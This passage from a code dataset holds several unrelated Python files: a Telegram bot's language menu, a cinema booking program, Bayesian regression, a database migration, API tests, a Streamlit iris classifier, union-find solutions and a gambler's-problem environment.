bt_callback, bt_name in find_lang[message.chat.id].items():\n key_lang = types.InlineKeyboardButton(text=bt_name, callback_data=f\"added_new,{bt_callback},{bt_name}\")\n bt_in_line.append(key_lang)\n keyboard.row_width = 3\n lang_list = []\n for value in lang_transl[message.chat.id].values():\n lang_list.append(value)\n page_lange(message, id_mess, keyboard, bt_in_line, f\"I have chosen {len(lang_list)} languages for you:\\n{', '.join(lang_list)}\\nClick to choose the ones you need\")\n return\n\n elif flag_dict == \"\":\n keyboard = types.InlineKeyboardMarkup()\n bt_in_line = []\n for bt_callback, bt_name in lang_transl[message.chat.id].items():\n key_lang = types.InlineKeyboardButton(text=bt_name, callback_data=f\"delete_lang,{bt_callback}\")\n bt_in_line.append(key_lang)\n keyboard.row_width = 3\n lang_list = []\n for value in lang_transl[message.chat.id].values():\n lang_list.append(value)\n page_lange(message, id_mess, keyboard, bt_in_line, f\"You have chosen {len(lang_list)} languages:\\n{', '.join(lang_list)}\\nClick to delete the ones you don't need\")\n return\n\n return id_mess\n\n\ndef page_lange(message, id_mess, keyboard, bt_in_line, text):\n keyboard.add(*bt_in_line) \n key_menu = types.InlineKeyboardButton(text=\"Back\", callback_data=\"menu\")\n key_find = types.InlineKeyboardButton(text=\"Search and add languages\", callback_data=\"find_again\")\n keyboard.add(key_menu, key_find) \n id_mess = bot.edit_message_text(text, chat_id=message.chat.id, message_id=id_mess.message_id, reply_markup=keyboard)\n return\n\n\ndef chose_lang(message, id_mess):\n if id_mess.message_id != message.message_id:\n bot.delete_message(message.chat.id, message.message_id)\n\n len_list_keys = []\n len_list_values = []\n user_input = message.text.lower().split(\"\\n\")\n if len(user_input) == 1:\n user_input = message.text.lower().split(\",\")\n \n for trans_lang, all_name_lang in LANG_DICT.items():\n for find_lang in user_input:\n find_lang = find_lang.strip()\n if (find_lang in all_name_lang) or (find_lang in trans_lang):\n len_list_keys.append(trans_lang)\n len_list_values.append(all_name_lang)\n if len_list_keys == []:\n try:\n id_mess = chose_button(message, id_mess, \"No results\")\n except telebot.apihelper.ApiTelegramException:\n pass\n # return find_again(message)\n return list_lang(message, len_list_keys, len_list_values, id_mess)\n\n\ndef list_lang(message, len_list_keys, len_list_values, id_mess):\n global find_lang\n\n find_lang[message.chat.id] = dict(zip(len_list_keys, len_list_values))\n id_mess = chose_button(message, id_mess, f\"You have chosen {len(find_lang)} languages:\\nClick to delete the ones you don't need\", flag_dict=\"added\")\n return id_mess\n\n\ndef exit_menu(call):\n help_keys, help_text = help_bot(call.message)\n message = call.message\n bot.clear_step_handler_by_chat_id(chat_id=message.chat.id)\n bot.edit_message_text(help_text, chat_id=message.chat.id, message_id=message.message_id, reply_markup=help_keys)\n return \n\n\ndef find_again(call):\n lang_transl.load_data()\n keyboard = types.InlineKeyboardMarkup()\n key_menu = types.InlineKeyboardButton(text=\"Back\", callback_data=\"menu\")\n keyboard.add(key_menu) \n id_mess = bot.edit_message_text(\"Enter language to translate:\", chat_id=call.message.chat.id, message_id=call.message.message_id, reply_markup=keyboard)\n return bot.register_next_step_handler(call.message, chose_lang, id_mess)\n\n\ndef added_find_lang(message):\n global find_lang\n global lang_transl\n\n lang_transl.add_data(message.message.chat.id, {message.data.split(\",\")[1] : message.data.split(\",\")[2]})\n del find_lang[message.message.chat.id][message.data.split(\",\")[1]]\n chose_button(message.message, message.message, text=\"\", flag_dict=\"added\")\n\n\ndef delete_find_lang(message):\n lang_transl.delete_data(message.message.chat.id, message.data.split(\",\")[1])\n chose_button(message.message, message.message, text=\"\", flag_dict=\"\")\n\n\nCHANGE_LANG_DICT = {\n \"menu\":exit_menu,\n \"find_again\":find_again,\n \"delete_lang\":delete_find_lang,\n \"added_new\":added_find_lang,\n }\n\n\n@bot.callback_query_handler(func=lambda callback: callback.data.split(\",\")[0] in [\"menu\", \"added_new\", \"find_again\", \"delete_lang\", ])\ndef start_change_lang(call, id_mess=None):\n keyboard = types.InlineKeyboardMarkup()\n key_menu = types.InlineKeyboardButton(text=\"Back\", callback_data=\"menu\")\n keyboard.add(key_menu) \n\n if type(call) == telebot.types.CallbackQuery:\n func = CHANGE_LANG_DICT.get(call.data.split(\",\")[0])\n func(call)\n message = call.message \n return\n else:\n message = call\n func = CHANGE_LANG_DICT.get(message.text)\n if func != None:\n func(message)\n return\n if id_mess == None:\n id_mess = message\n id_mess = bot.edit_message_text(\"Write the language of the translation to search for it:\", chat_id=message.chat.id, message_id=id_mess.message_id, reply_markup=keyboard)\n bot.register_next_step_handler(message, chose_lang, id_mess)\n return\n","repo_name":"DioSWolF/MyProjects","sub_path":"TeleBot/change_lang_translate.py","file_name":"change_lang_translate.py","file_ext":"py","file_size_in_byte":9140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5796372291","text":"\"\"\"This Program Works with a Cinema Hall.\nCreated by: Md. Samiul Basir\nEmail: turjotasin@gmail.com\n\"\"\"\n\n\n\nimport string\n\n\n#QUESTION 1\"\"\"\nclass Star_Cinema:\n def __init__(self):\n self.hall_list = []\n\n def entry_hall(self, hall_no):\n self.hall_list.append(hall_no)\n\n#QUESTION 2\"\"\"\nclass Hall(Star_Cinema):\n def __init__(self, rows, cols, hall_no):\n self.rows = int(rows)\n self.cols = int(cols)\n self. hall_no = hall_no\n self.seats = []\n self.show_list =[]\n self.show_id = []\n super().__init__()\n self.entry_hall(self.hall_no)\n\n #QUESTION 3\"\"\"\n def entry_show(self, id, movie_name, time):\n self.id = int(id)\n add = [id, movie_name, time]\n bro = tuple(add)\n tempseats = []\n self.show_list.append(bro)\n for items in enumerate(self.show_list):\n for i in range(self.rows):\n a = []\n for j in range(self.cols):\n a.append(f'{i}{j}')\n tempseats.append(a)\n self.seats.append(tempseats)\n\n\n self.show_id. append(self.show_list[self.id-1][0])\n\n #QUESTION 4\"\"\"\n def book_seats(self, customer_name, phone_number, id, row, column):\n\n #QUESTION 9\"\"\"\n self.__customer_name = customer_name\n self.__phone_number = phone_number\n self.id = int(id)\n #Id of the show er oikhane giye seat book korte hobe\n a = int(row)\n b = int(column)\n self.seats[self.id-1][a][b] = 'X'\n\n#QUESTION 5\"\"\"\n def view_show_list(self):\n for item in self.show_list:\n for values in item:\n print(values.ljust(20), end= ' ')\n print()\n\n#QUESTION 6\"\"\"\n def view_available_seats(self, id):\n print('PRINTING THE AVAILABLE SEATS'.center(65))\n print('______________________________________________________________________'.center(50))\n print('----------------------------------------------------------------------'.center(50))\n for i in range(self.rows):\n for j in range(self.cols):\n print(self.seats[int(id)-1][i][j].ljust(10), end=' ')\n print()\n\n print('----------------------------------------------------------------------\\n\\n')\n\n\n\na = Hall(4, 6, 12)\n#Adding some shows here\na.entry_show(id= '1', movie_name= 'The Platform', time = 'Nov 15, 2022')\na.entry_show(id= '2', movie_name= 'Siccin', time = 'Nov 12, 2023')\na.entry_show(id= '3', movie_name= 'The Green Mile', time = 'Nov 14, 2023')\n\n#\"QUESTION 7\"\"\"\nwhile(True):\n case = int(input('1. VIEW ALL SHOWS TODAY \\n'\n '2. VIEW ALL SEATS \\n'\n '3. BOOK TICKET\\n'\n '4. END PROCESS\\n'))\n if case ==1:\n print('ID'.ljust(21), 'MOVIE NAME'.ljust(21), 'TIME'.ljust(20))\n print('_________________________________________________________')\n print('---------------------------------------------------------')\n a.view_show_list()\n print('---------------------------------------------------------')\n print('\\n\\n')\n elif case ==2:\n id = int(input('ENTER SHOW ID: '))\n a.view_available_seats(id)\n elif case ==3:\n\n customer_name = input('NAME:')\n phone_number = input('PHONE NUMBER: ')\n\n # CHECKING THE SHOW ID IS CORRECT OR NOT\n while (True):\n id = input('ENTER SHOW ID: ')\n if id in a.show_id:\n break\n else:\n print(f\"========================================\")\n print(f\"!!!WRONG SHOW ID! ENTER SHOW_ID AGAIN!!!\")\n print(f\"========================================\")\n continue\n\n\n occupied = 0\n for item in a.seats:\n for inner_item in item:\n for ekdom_vitorer_item in inner_item:\n if ekdom_vitorer_item =='X':\n occupied += 1\n while(True):\n number_of_tickets = int(input(f\"ENTER NUMBER OF TICKETS YOU WANT TO BUY (Max {24-occupied}): \"))\n if number_of_tickets>(24-occupied):\n print(\"_____________ERROR KHAISEN VAI ABAR_____________\".center(50))\n print(\"!!!ETOGULA SEAT NAI VAI AMADER! GUSHTI NIYA ASHBEN NAKI?!!!\".center(50))\n print(\"___________________________________________________________\".center(50))\n else:\n break\n\n\n\n booked_seats = []\n i=0\n while(i<number_of_tickets):\n seat_no = input('ENTER SEAT NO:')\n if ((int(seat_no[0]) < a.rows and int(seat_no[1]) < a.cols) and len(seat_no)==2):\n if a.seats[a.id - 1][int(seat_no[0])][int(seat_no[1])] != 'X':\n a.book_seats(customer_name, phone_number, id, seat_no[0], seat_no[1])\n i= i+1\n booked_seats.append(seat_no)\n\n else:\n print('!!! WRONG SEAT NUMBER. ENTER SEAT NUMBER AGAIN !!!')\n\n\n print(\"-------CONGRATUALATIONS! BOOKED SEATS SUCCESSFULLY-------\".center(50))\n print(f\"-------BOOKED SEATS: {booked_seats}-------\".center(50))\n print(\"___________________________________________________________\".center(50))\n a.view_available_seats(id)\n print(\"\\n\"*3)\n\n\n elif case ==4:\n break\n else:\n print(\"_____________ERROR KHAISEN VAI ABAR_____________\".center(50))\n print('WRONG CHOICE! PLEASE ENTER CHOICE AGAIN')\n print(\"___________________________________________________________\".center(50))\n\n\n\n","repo_name":"basirtasin/OOP-project-on-Ticket-Booking-in-cinema-Hall-using-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36315317985","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport random\n\nfrom animation import AnimDrawer\n\nclass BayezianRegression():\n \"\"\"\n linear regression model by using bayezian estimation\n\n Attributes\n ------------\n M : int\n model dimention\n lam : float\n precision, parameter of model, inverse of variance\n pre_m : float\n mean\n pre_co_precision : float\n precision\n m : numpy.ndrray\n mean\n co_precision : numpy.ndarray\n precision\n m_opt : numpy.ndarray\n estimated mean\n lam_inv_opt : numpy.ndarray\n estimated variance\n \"\"\"\n def __init__(self, M):\n self.M = M # モデルの次元\n self.lam = 10. # モデルの精度(既知)\n\n # 事前分布のパラメータ\n self.pre_m = np.zeros(self.M) # 平均\n self.pre_co_precision = np.diag(np.eye(self.M)) # 共分散行列\n\n # 事後分布のパラメータ\n self.m = np.zeros(self.M) # 平均\n self.co_precision = np.diag(np.ones(self.M)) # 共分散行列\n\n # 予測分布のパラメータ\n self.m_opt = None\n self.lam_inv_opt = None\n\n def fit(self, X_data, Y_data):\n \"\"\"\n fit the model by using input data and output data\n\n Parameters\n -----------\n X_data : numpy.ndarray, shape(N, M)\n Y_data : numpy.ndarray, shape(N, ) \n \"\"\"\n\n self.co_precision = self.lam * np.dot(X_data.T, X_data) + self.co_precision\n print(\" np.dot(X_data.T, X_data) = {0}\".format( np.dot(X_data.T, X_data)))\n\n temp_1 = np.linalg.inv(self.co_precision)\n temp_2 = self.lam * (np.dot(Y_data, X_data) + np.dot(self.co_precision, self.m))\n print(\"temp_1 = {0}\".format(temp_1))\n print(\"temp_2 = {0}\".format(temp_2))\n\n self.m = np.dot(temp_1, temp_2.reshape(-1, 1))\n\n print(\"m = {0}\".format(self.m))\n\n def predict_distribution(self, X_data):\n \"\"\"\n make the distributionBayes\n Bayes\n Parameters\n ------------\n X_data : numpy.ndarray, shapeBayes(M, )\n\n Returns\n ---------\n m_opt : float\n estimated mean\n lam_inv_opt : float\n estimated variance\n deviation : float\n estimated deviation\n \"\"\"\n self.m_opt = np.dot(self.m.flatten(), X_data.reshape(-1, 1))\n\n temp_1 = np.linalg.inv(self.co_precision)\n self.lam_inv_opt = 1. / self.lam + np.dot(X_data, np.dot(temp_1, X_data.reshape(-1, 1)))\n deviation = math.sqrt(self.lam_inv_opt)\n\n return self.m_opt, self.lam_inv_opt, deviation\n\n def test_distribution(self):\n \"\"\"test\n This is test program for if it can make the gauss distribution\n Returns\n ---------\n w : numpy.ndarray\n parameter of linear regression\n true_ys : numpy.ndarray\n observation value made without noise\n sample_ys : numpy.ndarray\n observation value made with noise\n \"\"\"\n # wを計算\n w = np.random.multivariate_normal(self.m, np.linalg.inv(self.co_precision))\n\n sample_ys = []\n true_ys = []\n\n for sample_x in np.arange(-1, 1, 0.05):\n # sampling\n xs = [1.]\n for _ in range(self.M-1):\n xs.append(xs[-1] * sample_x)\n\n xs = np.array(xs)\n \n m = np.dot(w, xs.reshape(-1, 1))\n lam_inv = 1./ self.lam\n y = np.random.multivariate_normal(m, [[lam_inv]])\n sample_ys.append(y)\n true_ys.append(m)\n\n return w, true_ys, sample_ys\n\ndef main():\n # iteration number\n iteration_num = 50\n\n # history\n history_means = []\n history_deviations = []\n history_points = []\n # make data set\n X_data = []\n Y_data = []\n\n for _ in range(iteration_num):\n # make model\n dim = 10 # dimention of the linear regression model\n regressioner = BayezianRegression(dim) # make model\n\n # make data \n x_1 = (7.5 + 1.) * np.random.rand() + (- 1.)\n y = math.sin(x_1)\n temp_xs = [1.]\n for _ in range(dim-1):\n temp_xs.append(temp_xs[-1] * x_1)\n \n X_data.append(temp_xs)\n Y_data.append(y)\n # save\n history_points.append([x_1, y])\n \n # to numpy\n X_data = np.array(X_data)\n Y_data = np.array(Y_data)\n\n # fit the model\n regressioner.fit(X_data, Y_data)\n\n # prediction \n mus = []\n devs = []\n \n for sample_x in np.arange(-1., 7.5, 0.1):\n # make X_data\n x_data = [1.]\n for _ in range(dim-1):\n x_data.append(x_data[-1] * sample_x)\n\n mu_opt, lam_inv_opt, deviation = regressioner.predict_distribution(np.array(x_data))\n\n mus.append(mu_opt)\n devs.append(deviation)\n \n mus = np.array(mus).flatten()\n devs = np.array(devs)\n\n # save\n history_means.append(mus)\n history_deviations.append(devs)\n\n X_data = X_data.tolist()\n # print(\"X\\data = {0}\".format(X_data))\n Y_data = Y_data.tolist()\n\n draw_obj = [np.array(history_points), history_means, history_deviations]\n animdrawer = AnimDrawer(draw_obj)\n animdrawer.draw_anim()\n\nif __name__ == \"__main__\":\n main()","repo_name":"Shunichi09/Bayesian_Inference_training","sub_path":"3rd/linear_regression_with_animation.py","file_name":"linear_regression_with_animation.py","file_ext":"py","file_size_in_byte":5405,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"37948589312","text":"\"\"\"add description field to model\n\nRevision ID: 0c3e4fd362de\nRevises: b4c5225515f1\nCreate Date: 2022-05-18 12:43:20.709606\n\n\"\"\"\nimport sqlalchemy as sa\n\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"0c3e4fd362de\"\ndown_revision = \"b4c5225515f1\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column(\n \"model\",\n sa.Column(\n \"description\", sa.VARCHAR(), server_default=\"\", nullable=False\n ),\n )\n\n\ndef downgrade():\n op.drop_column(\"model\", \"description\")\n","repo_name":"epam/badgerdoc","sub_path":"models/alembic/versions/0c3e4fd362de_add_description_field_to_model.py","file_name":"0c3e4fd362de_add_description_field_to_model.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"3"} +{"seq_id":"29173491807","text":"\"\"\"Tests project modify API.\"\"\"\n\nimport pytest\nimport http.client\n\nfrom infra.walle.server.tests.lib.util import TestCase\nfrom walle.constants import TESTING_ENV_NAME\n\n\n@pytest.fixture\ndef test(request, monkeypatch_production_env):\n test = TestCase.create(request)\n test.mock_projects()\n return test\n\n\n@pytest.fixture\ndef mocked_project(test):\n project = test.mock_project({\"id\": \"orig-id\", \"name\": \"Some name\"})\n return project\n\n\n@pytest.yield_fixture()\ndef project_idm_push_called(enable_idm_push, project_idm_add_role_nodes_mock, project_idm_request_project_roles_mock):\n yield\n assert project_idm_add_role_nodes_mock.called\n assert project_idm_request_project_roles_mock\n\n\ndef call_clone_api(test, orig_id=\"orig-id\", new_id=\"new-id\", new_name=\"New name\"):\n return test.api_client.open(\"/v1/projects/clone/\" + orig_id, method=\"POST\", data={\"id\": new_id, \"name\": new_name})\n\n\n@pytest.mark.usefixtures(\"unauthenticated\", \"mocked_project\")\ndef test_unauthenticated(test):\n result = call_clone_api(test)\n assert result.status_code == http.client.UNAUTHORIZED\n test.projects.assert_equal()\n\n\n@pytest.mark.usefixtures(\"unauthorized_project\", \"mocked_project\")\ndef test_unauthorized(test):\n result = call_clone_api(test)\n assert result.status_code == http.client.FORBIDDEN\n test.projects.assert_equal()\n\n\n@pytest.mark.usefixtures(\"mocked_project\", \"project_idm_push_called\")\ndef test_normal_clone(test):\n result = call_clone_api(test)\n assert result.status_code == http.client.CREATED\n\n test.mock_project({\"id\": \"new-id\", \"name\": \"New name\"}, save=False)\n test.projects.assert_equal()\n\n\n@pytest.mark.usefixtures(\"mocked_project\")\ndef test_original_doesnt_exist(test):\n result = call_clone_api(test, orig_id=\"nonexistent-id\")\n assert result.status_code == http.client.NOT_FOUND\n test.projects.assert_equal()\n\n\n@pytest.mark.usefixtures(\"mocked_project\", \"project_idm_add_role_nodes_mock\", \"project_idm_request_project_roles_mock\")\ndef test_duplicated_name(test):\n call_clone_api(test, new_id=\"new-id\")\n test.mock_project({\"id\": \"new-id\", \"name\": \"New name\"}, save=False)\n\n result = call_clone_api(test, new_id=\"new-id\")\n assert result.status_code == http.client.CONFLICT\n\n test.projects.assert_equal()\n\n\n@pytest.mark.usefixtures(\"mocked_project\")\ndef test_clone_name_conflict(test):\n test.mock_project({\"id\": \"new-id\", \"name\": \"New name\"})\n\n result = call_clone_api(test, new_id=\"new-id\")\n assert result.status_code == http.client.CONFLICT\n\n test.projects.assert_equal()\n\n\ndef test_clone_wrong_env_regular_user(test, mp):\n env_name = TESTING_ENV_NAME\n mp.config(\"environment.name\", env_name)\n result = call_clone_api(test)\n assert result.status_code == http.client.FORBIDDEN\n assert result.json[\n \"message\"\n ] == \"Authorization failure: This method is available only for Wall-E admins on {} environment.\".format(env_name)\n\n test.projects.assert_equal()\n\n\n@pytest.mark.usefixtures(\"mocked_project\", \"project_idm_push_called\")\ndef test_clone_wrong_env_admin(test, mp):\n env_name = TESTING_ENV_NAME\n mp.config(\"authorization.admins\", [test.api_user])\n mp.config(\"environment.name\", env_name)\n result = call_clone_api(test)\n assert result.status_code == http.client.CREATED\n\n test.mock_project({\"id\": \"new-id\", \"name\": \"New name\"}, save=False)\n test.projects.assert_equal()\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"infra/tests/api/project_api/test_clone.py","file_name":"test_clone.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12385938862","text":"## Web\nimport streamlit as st\n## EDA\nimport pandas as pd\n## Visualisasi\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use(\"Agg\")\nimport seaborn as sns\n## Machine Learning\nfrom sklearn.model_selection import KFold, train_test_split\nfrom sklearn.metrics import plot_confusion_matrix, classification_report\nfrom sklearn.pipeline import Pipeline\nfrom sklearn import model_selection\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\n\n\nclass Web:\n def __init__(self, *args, **kwargs) -> None:\n super().__init__(*args, **kwargs)\n st.title(\"Judul Yang Saya Buat\")\n st.subheader(\"Ini subheader yang saya buat\")\n st.markdown(\"\"\"\n #### Description\n + This is a example EDA \"\"\")\n\n def eda (self, data) -> None:\n st.header(\"Explonatory Data Analysis\")\n if data is not None:\n df = pd.read_csv(data)\n st.write(df)\n\n if st.checkbox(\"Show Shape\"):\n st.write(df.shape)\n \n if st.checkbox(\"Show Columns\"):\n all_columns = df.columns.to_list()\n st.write(all_columns)\n\n if st.checkbox(\"Show Data Null\"):\n st.write(df.isnull().sum())\n \n if st.checkbox(\"Show Duplicate Data\"):\n st.write(df[df.duplicated()])\n \n if st.checkbox(\"Show Description Data\"):\n st.write(df.describe())\n \n if st.checkbox(\"Show Value Counts\"):\n st.write(df.iloc[:-1].value_counts())\n\n if st.checkbox(\"Class Counts Bar Plot\"):\n st.set_option('deprecation.showPyplotGlobalUse', False)\n plt.title(\"Class Count Plot\")\n st.write(sns.countplot(x=df[\"Species\"]))\n st.pyplot()\n\n if st.checkbox(\"Distribution Bar Plot\"):\n all_columns = df.columns.to_list()\n column1 = st.selectbox(\"Select X Column\", all_columns)\n column2 = st.selectbox(\"Select Y Column\", all_columns)\n plt.title(\"Distribution Species\")\n st.write(sns.boxenplot(y=column2, x=column1, data=df, orient='v'))\n st.pyplot()\n\n if st.checkbox(\"Pair Plot\"):\n st.write(sns.pairplot(df, hue=\"Species\"))\n st.pyplot()\n\n if st.checkbox(\"Correlation Plot\"):\n st.write(sns.heatmap(df.corr(), annot=True))\n plt.title(\"Correlation Plot\")\n st.pyplot()\n\n \n st.header(\"Machine Learning Model\")\n X = df.iloc[:,0:-1]\n Y = df.iloc[:,-1]\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n models = []\n models.append(('LR', Pipeline([('scaler', StandardScaler()), ('lr', LogisticRegression())])))\n models.append(('DT', Pipeline([('scaler', StandardScaler()), ('dt', DecisionTreeClassifier())])))\n models.append(('KNN', Pipeline([('scaler', StandardScaler()), ('knn', KNeighborsClassifier())])))\n\n models_name = []\n models_mean = []\n models_std = []\n all_models = []\n scoring = 'accuracy'\n for name, model in models:\n kfold = model_selection.KFold(n_splits=10, random_state=42, shuffle=True)\n cv_result = model_selection.cross_val_score(model, X_test, y_test, cv=kfold, scoring=scoring)\n models_name.append(name)\n models_mean.append(cv_result.mean())\n models_std.append(cv_result.std())\n accuracy_result = {\"model name\":name, \"model accuracy mean\": cv_result.mean(), \"model accuracy std\": cv_result.std()}\n all_models.append(accuracy_result)\n\n if st.checkbox(\"Table\"):\n st.dataframe(pd.DataFrame(zip(models_name, models_mean, models_std), columns=[\"Algoritma\", \"Mean\", \"Std\"]))\n \n if st.checkbox(\"JSON\"):\n st.json(all_models)\n\n clf = Pipeline([('sclaer', StandardScaler()), ('dt', DecisionTreeClassifier())])\n clf.fit(X_train, y_train)\n y_pred = clf.predict(X_test)\n\n st.subheader(\"Confusion Matrix\")\n st.set_option('deprecation.showPyplotGlobalUse', False)\n plot_confusion_matrix(clf, X_test, y_test)\n st.pyplot()\n\n st.subheader(\"Classification Report\")\n report = classification_report(y_test, y_pred)\n st.text(report)\n\n st.subheader(\"Check Model\")\n sepal_length = st.slider('Sepal Length', 4.3, 7.9, 5.4)\n sepal_width = st.slider('Sepal Width', 2.0, 4.4, 3.4)\n petal_length = st.slider('Petal Length', 1.0, 6.9, 1.3)\n petal_width = st.slider('Petal Width', 0.1, 2.5, 0.2)\n\n dat = { 'sepal_length':sepal_length,\n 'sepal_width':sepal_width,\n 'petal_length':petal_length,\n 'petal_width':petal_width\n }\n features = pd.DataFrame(dat, index={0})\n st.write(features)\n\n prediction = clf.predict(features)\n prediction_proba = clf.predict_proba(features)\n\n st.subheader('Result')\n st.write(prediction)\n\n st.subheader('Prediction Probability')\n st.write(prediction_proba)\n \n\n\n\n def main(self) -> None:\n data = st.file_uploader(\"Upload file\", type=[\"csv\", \"text\"])\n self.eda(data)\n \n\n\nif __name__ == '__main__':\n app = Web()\n app.main()","repo_name":"kristiyanlaoli/learn-streamlit","sub_path":"learn_streamlit2.py","file_name":"learn_streamlit2.py","file_ext":"py","file_size_in_byte":5786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25335824910","text":"# BFS / DFS / Union-Find / Floyd\n\n# Floyd\nimport collections # 数据类型容器模块\nimport itertools # 为高效循环而创建迭代器的函数\n# Runtime: 36 ms, faster than 86.30% of Python3 online submissions for Evaluate Division.\n# Memory Usage: 13.1 MB, less than 77.62% of Python3 online submissions for Evaluate Division.\nclass Solution:\n def calcEquation(self, equations: List[List[str]], values: List[float], queries: List[List[str]]) -> List[float]:\n quot = collections.defaultdict(dict) # 建图\n for (num, den), val in zip(equations, values): # 填图\n quot[num][num] = quot[den][den] = 1.0\n quot[num][den], quot[den][num] = val, 1 / val\n for i, j, k in itertools.permutations(quot, 3): # 填图\n if i in quot[j] and k in quot[i]:\n quot[j][k] = quot[j][i] * quot[i][k]\n return [quot[num].get(den, -1.0) for num, den in queries] # 获取\n\n\n# Union Find\nclass Solution:\n def calcEquation(self, equations: List[List[str]], values: List[float], queries: List[List[str]]) -> List[float]:\n res = []\n parent = {} # e.g. [\"a\", \"b\"] then parent[a] = b\n weight = {} # e.g. a / b then weight[a] = 2.0\n ufind = UnionFind(parent, weight)\n for i, (x1, x2) in enumerate(equations): # union\n if x1 not in parent and x2 not in parent:\n parent[x1], weight[x1] = x2, values[i]\n parent[x2], weight[x2] = x2, 1\n elif x1 not in parent:\n parent[x1], weight[x1] = x2, values[i]\n elif x2 not in parent:\n parent[x2], weight[x2] = x1, 1 / values[i]\n else:\n ufind.union(x1, x2, values[i])\n for x1, x2 in queries: # find\n if x1 not in parent or x2 not in parent or ufind.find(x1) != ufind.find(x2):\n res.append(-1.0)\n else:\n factor1, factor2 = weight[x1], weight[x2]\n res.append(factor1 / factor2)\n return res\n\n\nclass UnionFind(object):\n def __init__(self, parent, weight):\n self.parent = parent\n self.weight = weight\n\n def find(self, vertex): # 查找\n if self.parent[vertex] == vertex: return vertex\n root = self.find(self.parent[vertex])\n self.weight[vertex] *= self.weight[self.parent[vertex]]\n self.parent[vertex] = root\n return root\n\n def union(self, vertex1, vertex2, val): # 联盟\n root1, root2 = self.find(vertex1), self.find(vertex2)\n self.parent[root1] = root2\n self.weight[root1] = self.weight[vertex2] * val / self.weight[vertex1]\n","repo_name":"daidai21/Leetcode","sub_path":"Algorithms/Python3.x/399-Evaluate_Division.py","file_name":"399-Evaluate_Division.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"27389101746","text":"import dv_toolkit as kit\nfrom datetime import timedelta\n\n# Initialize reader\nreader = kit.io.MonoCameraReader(\"/home/kuga/Workspace/tmp-dvstoolkit-v2/data/test-01.aedat4\")\n\n# Get offline MonoCameraData\ndata = reader.loadData()\n\n# Initialize slicer, it will have no jobs at this time\nslicer = kit.MonoCameraSlicer()\n\n# Print events\ndef print_event_info(data):\n print(data[\"events\"])\n\n# Register this method to be called every 33 millisecond of events\nslicer.doEveryTimeInterval(\"events\", timedelta(milliseconds=33), print_event_info)\n\n# Register this method to be called every 2 elements of frames\nslicer.doEveryNumberOfElements(\"frames\", 2, print_event_info)\n\n# Now push the store into the slicer, the data contents within the store\n# can be arbitrary, the slicer implementation takes care of correct slicing\n# algorithm and calls the previously registered callbacks accordingly.\nslicer.accept(data)","repo_name":"KugaMaxx/yam-toolkit","sub_path":"python/samples/data_slicing.py","file_name":"data_slicing.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"37421139494","text":"# import matplotlib;\n#\n# matplotlib.use(\"TkAgg\")\n\nimport gym\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\nfrom matplotlib.animation import FuncAnimation\n\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\n\nclass Gambler(gym.Env):\n \"\"\"\n The gamblers problem from Sutton and Barto 2020 Exercise 4.2\n \"\"\"\n\n def __init__(self, target=100, head_prob=0.3, gamma=1):\n # amount to reach\n self.fig = None\n self.pi_history = []\n self.vi_history = []\n self.gamma = gamma\n self.TARGET = target\n\n # all states, including state 0 and state Target\n self.observation_space = gym.spaces.Discrete(self.TARGET + 1)\n # init initial state\n self.current_state = None\n\n # probability of head\n self.HEAD_PROB = head_prob\n\n # state value array (everywhere zero) - increase precision\n # self.state_value = np.zeros(self.observation_space.n, dtype=np.float64)\n # final state value\n\n self.max_action = None\n\n # we have perfect knowledge about the environment - let's define the probabilities\n def actions(state):\n return range(min(state, self.TARGET - state) + 1)\n\n self.P = {s: {a: [] for a in actions(s)} for s in range(self.observation_space.n)}\n\n for state in self.P:\n for action in self.P[state]:\n prob_next_state_and_r = self.HEAD_PROB\n probs = [(prob_next_state_and_r, state + action,\n int(state + action >= self.TARGET),\n state + action >= self.TARGET),\n (1 - prob_next_state_and_r, state - action, 0, state - action <= 0)]\n # terminal states\n if state == self.TARGET:\n probs = [(1, state, 1,\n True)]\n elif state == 0:\n probs = [(1, state, 0,\n True)]\n self.P[state][action] = probs\n # print(self.P)\n\n def step(self, action):\n # if we want to sample from the environment\n\n # get possible actions for current state\n assert (action <= self.max_action) and (action >= 0), \"Action not valid\"\n self.current_state = (self.current_state + action) \\\n if random.random() <= self.HEAD_PROB else (self.current_state - action)\n done = self.current_state >= self.TARGET or self.current_state <= 0\n reward = done\n if not done:\n self.max_action = min(self.current_state, self.TARGET - self.current_state) + 1\n return self.current_state, reward, done, {}\n\n def reset(self, set_state=None):\n if set_state is not None:\n self.current_state = set_state\n else:\n # init returns a random state\n self.current_state = self.observation_space.sample()\n self.max_action = min(self.current_state, self.TARGET - self.current_state) + 1\n return self.current_state\n\n def value_iteration(self):\n # We find the optimal state-value function for the problem\n sweeps_history = []\n n_iter_max = 10000\n # important how accurate the approximation is\n threshold = 1e-20\n # value iteration - increase slightly the accuracy\n state_value = np.zeros(self.observation_space.n, dtype=np.float64)\n for n_iter in range(n_iter_max):\n # On each iteration, copy the value 